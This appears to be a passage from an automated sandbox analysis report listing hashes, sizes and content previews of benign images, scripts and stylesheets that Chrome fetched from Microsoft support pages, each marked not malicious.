                                                                                                                      Size (bytes):15286
                                                                                                                      Entropy (8bit):7.920093772155082
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PBOSXIcsH16kp+153RInfDCuhcuCMmr+sAY:ADcsUs+7SfDJhcuCM0zAY
                                                                                                                      MD5:B1266F754B66F7B007B60511E2A2C4A0
                                                                                                                      SHA1:2A7A404B98732BDEB9CD63C7A672AC0011788AEB
                                                                                                                      SHA-256:B0A544B82B7B83A42F0AEC9C46909290726F4F57BF437264FBE0CB17C2827B7B
                                                                                                                      SHA-512:676C337E3B4A1C22D52C5000ED8ABF0E233C558C7B46A690CEC8ED26C76D2C6DAF265EBCBC51FB9B863A8D4E381ADA5859D4EEEC4DF30150C7FBA3B5F5DF8DC0
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...;KIDATx..{.-WU..-m).V.....b....&Fm.Fm...!Z..l)R.T!.a.(.QQ...U.gI..H.B...hy..-.O./.....:.....={....|..s..={....=k......~(...."..8..=e..4...>....m...i..t...}..-M.kd.c\b[...G.p...P..:&.@qbBS..!L..`>.RP=K...&...slX.S..t_)..L.....z.....u.[?.|.c..p>....r.UH-.9.,.>.cl.\t1...$..TWy..8......@!.b..:m...`Y,..06C.M...[.j....@?.H..Xn.F.4U.R-S5........l.\.....r.e.j...:..P'.)..%.Tn...g....N......M0.L.&R.H....L.....J.Oj.S.....0?.-RK....hs.g......X]..uS,R.c.C.[/..m....U..\C..y......E.B.H.G...[.......TE..BD...TM..)......MQK.R.gb.S.....@HU.....b...<...#.....K.?"..`..)..c..6.Q.r.T....`<.R3.%j..Ig`.....\..e..`Z.R.=.Sp.........Bj.....2..C....n.?.....(IQ!...L..T+..R.Z...#..vmn...).8.}7....@e..@G4....B..........AHA..]...,.V).!..L.B*..'..RI7..`<.R.3QB.......(.B.`a.o....P...;......1..`..\.s.....)uKmk.KX3.m....f...0.....d.l..@...I.....:......7$.E...m.....P....B.;.....P....B@.....B..2..S....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89476
                                                                                                                      Entropy (8bit):5.2896589255084425
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):211842
                                                                                                                      Entropy (8bit):5.548839465294018
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:DismT/mHKxQlVyDqBPAizS7Mzm3NLJa2lQn+S/7qSASyntnh:2smT+X+NLJab+SzqSASyntnh
                                                                                                                      MD5:C1338BAD680C7B30034BB2BEE2C447D3
                                                                                                                      SHA1:E93C535395F25D15F4AA67E481DFCEAF94F25A1E
                                                                                                                      SHA-256:906A3B2A89AA06A9C0DA125FBF248D1F9FD188511B44D4822D9E3FCFD28197E8
                                                                                                                      SHA-512:AE28ACA7B8AAB00F7EAF2B5EBCE86F23DD1B91E711100110ED4E2B7B6A68A1284AF777EC87C652789BBBC50B5FA95A18A47A1D1F5B1FF65FDBC6E56EE6FA31E7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meBoot.min.js
                                                                                                                      Preview:MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,S){"use strict";var c=function(){},i={},u=[],p=[];function O(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20946
                                                                                                                      Entropy (8bit):7.93232536946356
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ecpgK1ekapmcRcYDw6SaYAwQTniYPMalqQm6vkoP9njpqNT:eKjUkapAsw6C9ePM2qQm6vkoFnwT
                                                                                                                      MD5:68B6034D22E6083CF2592BF4B8B71F0E
                                                                                                                      SHA1:0981B22AF5F2BF930794557717FF7C7F4FF563FF
                                                                                                                      SHA-256:56E5D47C342207184BE9DE6E3CF06CF26C32B34EE799B3ACC95EBEEEEFA5484A
                                                                                                                      SHA-512:3CDA6510769E8EE427103B1D76A0035E2A3E62C4EF0E789DBC28969B12F2DF2C1F7E7652FDF9CC99C7C086CF2764A19520D15A5FED86ECC5CAB9D9F77D534E93
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...QgIDATx....nEy....j.%bU.X..n^......Im..M."Z...+hU...m.e.....A.FQ.m......D....ELTD...Uo}...>.|3....v....y..gf.:.?.yf..n.m..a..*......+.~..J u..}.k.........:;v.P......qM.c;.1.S..j..@v....O...c.@.....5Z.P.E{...P.(.......PvvQ..... .IGj...U.:}.#..Xghj.C.MQ...Kua...)G,4]..?.........#.......w.Ti'.Vy....S....%._).'...J...%.u\.R.Oo.R,p......"Y....N:V*.P.R.W......O..Pk...n......Z.....).....HVc.Z.M....H....X......5....$....p......".>...<U...Sc.|.K...Q.NR...k...k...F...).....H...=.....+.zj(....]/5.\.........).....H...\.@.;.|......*.I.&5.'.(6.cTz^.....c.r...r....k.)s.b..<.#......I.1R....k..6........R.d....r.]...NT].H.....D.#%.N..X.......7.t,..z.;cS.p].f....E-...6.#......IuG...p..c[.g.`..v..R1V...J.9.J... ..HqIw.NS..........3.G..pI.+p.....#.N.......Gp....).....Hf.H..1.#.*4..2r.f....t..;.Z.7W........".=1d...^.....M ..I..T...../.t.T...........*....._JLz)......{..h*FJ...E..t9.).WaXj&
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (728)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11405
                                                                                                                      Entropy (8bit):5.337832455968521
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ei4mI8A10VNEHbnIB89tGRbvlG/bUgck7L8Dap8z+vRjQfymrQy1Zy1Gy1M+qmWW:eiy1F7nIB89tGRbvaUBvk8qjQfymrQy8
                                                                                                                      MD5:FF9CACB22668C4F6174E0AF4A2BE89F9
                                                                                                                      SHA1:EC9ED15001A3E13404660B6EA09F99C512E08882
                                                                                                                      SHA-256:EF39A5CC6826231852FD8D60736867DA31E7E9036F3575B1DC4846DC6FB86A3B
                                                                                                                      SHA-512:267064DCB16AB4B9B19756C2313CCB9E5B467A41427DE9BF46158A1C2231699EC43D51C2F201D97C02AFA31BF5011FF471035CF10C7DC6003299B86D85C52806
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var UHFButton=$("header #c-uhf-nav-cta \x3e a");0<$("meta[name\x3d'blue-cta']").length&&UHFButton.addClass("blue-cta");UHFButton.css("visibility","visible");var mainLandmark=$("main"),rootNode=$(".root");0< !mainLandmark.length&&0<rootNode.length&&rootNode.attr("role","main");.function changeSupToAnchor(){try{var a="",b="",c=[];$("sup:not(.no-link)").each(function(){a=$(this).text();a=a.replace("*(","");a=a.replace(")","");c=a.split(", ");for(var e=0;e<c.length;e++)b+="\x3ca aria-label\x3d'Footnote "+c[e]+"' href\x3d'javascript:void(0);' class\x3d'c-hyperlink supBLink'\x3e\x3cspan class\x3d'supText'\x3e"+c[e]+"\x3c/span\x3e\x3c/a\x3e\x3cspan\x3e, \x3c/span\x3e";$(this).html(b);b=""});$("sup").find("span:last").remove();var d=$(".list-unstyled li a.superscript");d.attr("href",."javascript:void(0);");d.addClass("supLink");d.each(function(){0==$(this).find(".supFn").length&&$(this).wrapInner("\x3cspan class\x3d'supFn'\x3e\x3c/span\x3e")})}catch(e){console.log(e)}}.function n
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):18254
                                                                                                                      Entropy (8bit):7.950218967534029
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4ZgtqkzeTs36Io/E0ZadkL8eExKAF+2/IEBTbztwaLAWoAGuJ:4aBzwWunZayL8eExKAFtQOTbzCak92
                                                                                                                      MD5:334DB99BB88BA472A3116C0B3A7449DE
                                                                                                                      SHA1:12B43CCBAA0A58336319B7AD981F8EECE202228F
                                                                                                                      SHA-256:2853C551260E74FD1BADFBBCBA7ADC12539FC2BBC6124516D3AE4F3BDD76A2CA
                                                                                                                      SHA-512:8AB869E0D4201A8F1BF2FDAE69524E481E80502D0881837D57B7ECF91075E0BE3A0DDFCD4E045B0CD5FEEFB405067A0EE76B1CFEA902C43D546AE9AF9F0DB469
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/9255871d-06a6-4de5-9236-5fd7af100c5c.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...F.IDATx..y.&Uu....P. .&"...........`...".!e$.e..M.Q..T.d...18....HJ+j.@R.E+&e"..,%K.B.f.?.Y..4.g..v....ow.>U]........o.s.;........a...\.-[....cIN3.......Pr<._.r.{B............[.).5k*..{..G.).n.........V....]n.{...5.....L..P+..%7.mW&,R..=..\...pu.T.s.J...._.....2........xW..s$TL.eCIu.9. $.INm..m.]{c_l*....~..q..x...G.........=..r.`Z.X.b.)PO-.Dg...Iu..v.R....F. .-....E.Hix......*57B.5.!.....".029...@O...}.r"..S.....a_..#....qhO..<..s.C..7.~.E..... .....}........,../2X...`...L..pZ.}...k...e..aM.u........k.^U~..z.@.f..2.:.......!*m.v.0........3D...}.&.$..@ZB-T.J.=.. .].+..>.....!..0SR7R.3.3m..)...0.....y..PFm...{<S....s.'...`!....z..O..y.u....@Zrp..b.c...=........:..:F.'+BJ..'.@..v.K.=..b.PU.h}.*.H...... .,R.R[..g.$....:........".\s{.8.Kh..F.hz..R.....&..'...%..)..S..m.......s.k.. cb..,....p.H.U.....")..t..)...Z...i.W..\.`!...S..C.5.Z..........$.j..b....l*em.t^..K...hr
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (367), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):367
                                                                                                                      Entropy (8bit):4.9898089353102595
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q3RnadmyWRLnadIrM9nadYErmC+LGI1nadmWYElnH0IASS3c7swWJ/cxGPvZ/c8e:cYdIRGdIg8dlHEGIUd4Eh0IA1cbWNb9u
                                                                                                                      MD5:F81E446FAC9DB5FB37845DD4E069AE27
                                                                                                                      SHA1:DE12C417D44EC6A6AC52D5D41BBB35CE8C9A2097
                                                                                                                      SHA-256:CD4B2B854F0E1BF350B4E61D015794D0F33A0B187A0C78912085E4DB1CD65F0B
                                                                                                                      SHA-512:E13DDEDB6117E516E4278E4F1B6AA80DD62EAF8966E64F5D45D452D85FE2AAD990D770101934BC12AA37B4CDF8D3B3B86DDBD116B53E7C1AE1BFD73AA9C18584
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';$(function(){var a=document.querySelector("#msChatContainer"),b=document.querySelector(".back-to-top.sticky"),c=document.querySelector(".fixed-back-to-top.fixed-sticky"),d=!(!document.querySelector("#storeassistantroot")||!window.storeAssistantReactJsLib);a&&b&&!d&&$(b).addClass("pageHasChatContainer");a&&c&&!d&&$(c).addClass("pageHasChatContainer")});
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):631
                                                                                                                      Entropy (8bit):6.391875872958697
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7s6UVprYe6IZeuLgou+/CAztgbbvCR00aJzS4VQIjXuYEMwoQIjXuHBOLPMdo:hX7rRkf+/rMcCJzAIjNEMwNIj8Efl9
                                                                                                                      MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                                                                      SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                                                                      SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                                                                      SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/favicon-32x32.png
                                                                                                                      Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65394)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):91802
                                                                                                                      Entropy (8bit):5.3603423050848615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                                      MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                                      SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                                      SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                                      SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                                      Malicious:false
                                                                                                                      URL:https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js
                                                                                                                      Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (590)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1716
                                                                                                                      Entropy (8bit):5.2304068952006615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                      MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                      SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                      SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                      SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                                                                      Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):406
                                                                                                                      Entropy (8bit):4.999363379384117
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:ks6KjE5TkTDphV19fuYRTHVGeVphV1cRIKacdvNeJR4:kAI5gXpJ9fu8FpJgIK/dUf4
                                                                                                                      MD5:DF20EB81FA2AF3A1C0B0246A9A6A9485
                                                                                                                      SHA1:6A76AA264C75B186F9291C351373E89DC3B6D59B
                                                                                                                      SHA-256:99E81FEE9CAB25A579FDDFCA6EFCB65A196545FB79FD5FA5D711C5C377C4BFFF
                                                                                                                      SHA-512:22F39F69A3FC0A603DA2F169005B6CE35E21B3454C0379792F7DE266CE30063BE4F66B5264E04226B783AFD7E1328951174D470B0E1395AB4A3D4E52BCE73D77
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-experimentations.min.ACSHASHdf20eb81fa2af3a1c0b0246a9a6a9485.css
                                                                                                                      Preview:.experimentation{-webkit-box-ordinal-group:-1 !important;-ms-flex-order:-2 !important;order:-2 !important}..wayFindingModel-mlsd-exp.modal.show .modal-dialog{background:rgb(255,255,255,0.9);max-width:100% !important;justify-content:center}..wayFindingModel-mlsd-exp.modal.show .modal-dialog .modal-content{max-width:800px;border:1px solid #0067b8}..wayFindingModel-mlsd-exp .modal-images img{max-width:50%}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2674)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2728
                                                                                                                      Entropy (8bit):5.253272384445131
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:M1wQmQqQNrfAI4dz2eLNBxROk2oDZ8nVlnQiOk50NQclnmlnmZ5flnqlnuln5jBN:emQjNj4t2eLNgsdiQj+RacmVYU57vzKO
                                                                                                                      MD5:468D4ACC570CFFC7101AC8A63514AD31
                                                                                                                      SHA1:6983E89B6EC798B5B8C2B3B76D9311808437B572
                                                                                                                      SHA-256:B4B342F2025799CA602A75590B324E7493B0903726720BCE4CA793207C83255C
                                                                                                                      SHA-512:9042A219E8511FF281B9F680B3577CE3EAE29E881F24BE1D2B46C89D1F0013E30AA890C1A0181FF83975E125F62C0C6E896D3B8515067221143D9A3290B42865
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var t,e,n=function(t){try{return sessionStorage.getItem(t)}catch(t){}return null};!function(t){t.EXPANDED="meControlAccountSelectorExpanded",t.COLLAPSED="meControlAccountSelectorCollapsed",t.SWITCHTYPE="meControlSwitchAccountType",t.SWITCHMSA="meControlSwitchMSAAccount",t.SWITCHAAD="meControlSwitchAADAccount"}(t||(t={})),function(t){t.REMOVE="teachingCalloutRemove",t.SHOWN="teachingCalloutShown",t.TIMEOUT="teachingCalloutTimeout"}(e||(e={}));var o,i,a=$("#meControl"),l=$("#smcTeachingCalloutPopover"),c=$("#teachingCalloutDismiss"),r="teachingCalloutShown";function d(t,e){var n,o={isAuto:!1,content:{contentId:e},behavior:t};null===(n=window.analytics)||void 0===n||n.captureContentUpdate(o)}$((function(){l&&l.length>0&&(function(t,e){if(t.length&&e.length){var n=t.offset().top;i=window.setInterval((function(){var o=e.offset().top;t.offset({top:n+o})}),15)}}(l,a),window.document.addEventListener("displayTeachingCallout",(function(t){try{if(null===n(r)&&null!=t.det
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30237)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):30289
                                                                                                                      Entropy (8bit):5.260974426031687
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:u2E2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:u1M0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:F04D3E51969894BD486CD9A9A1549EA6
                                                                                                                      SHA1:6DB7ED2E034FE99F5013144CA91DD21408F7AC36
                                                                                                                      SHA-256:33A747222E8AE5381AEB53C9671BB3EB309B7226587674CD6D901F99645A852B
                                                                                                                      SHA-512:C7BE3DAB8EF8DBCB3A0AA6022F8191F155358E4E974F0E42F9CD88C372EE77EB4513A6CC54E373CFE90232D67C6B02406B4D281D8158C24B51C8AA433452911C
                                                                                                                      Malicious:false
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"smcconvergence","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authA
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):211842
                                                                                                                      Entropy (8bit):5.548839465294018
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:DismT/mHKxQlVyDqBPAizS7Mzm3NLJa2lQn+S/7qSASyntnh:2smT+X+NLJab+SzqSASyntnh
                                                                                                                      MD5:C1338BAD680C7B30034BB2BEE2C447D3
                                                                                                                      SHA1:E93C535395F25D15F4AA67E481DFCEAF94F25A1E
                                                                                                                      SHA-256:906A3B2A89AA06A9C0DA125FBF248D1F9FD188511B44D4822D9E3FCFD28197E8
                                                                                                                      SHA-512:AE28ACA7B8AAB00F7EAF2B5EBCE86F23DD1B91E711100110ED4E2B7B6A68A1284AF777EC87C652789BBBC50B5FA95A18A47A1D1F5B1FF65FDBC6E56EE6FA31E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,S){"use strict";var c=function(){},i={},u=[],p=[];function O(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6125), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6125
                                                                                                                      Entropy (8bit):5.234103429010352
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:W/M/m/i8V//c//55T/hAh6QcVsOZdNABvQUSZacKp3xAxgBxjGYnvDYn79NN7ZuV:W8mi89/M/5xE6QcVsOZdNAJmotp3xAxU
                                                                                                                      MD5:97C18402D0D5AD89F12C548A55C8284F
                                                                                                                      SHA1:412ACD023C48FA79C9F846040497C74C2EBEC46D
                                                                                                                      SHA-256:464730FF27CB58E32D39C58E96330E89983298C72B1B4183A68E0B7FE4D4CCFA
                                                                                                                      SHA-512:38C551DBEC500AA1C450FDADE3E24FA16E71066F7CD75E103E6787C8687838E89BE49181C491F1234D29D7CCECA2B9C0C9FA20010548AD4E5F83D66D0AD1F02F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/feedback/feedback.css?v=Rkcw_yfLWOMtOcWOljMOiZgymMcrG0GDpo4Lf-TUzPo
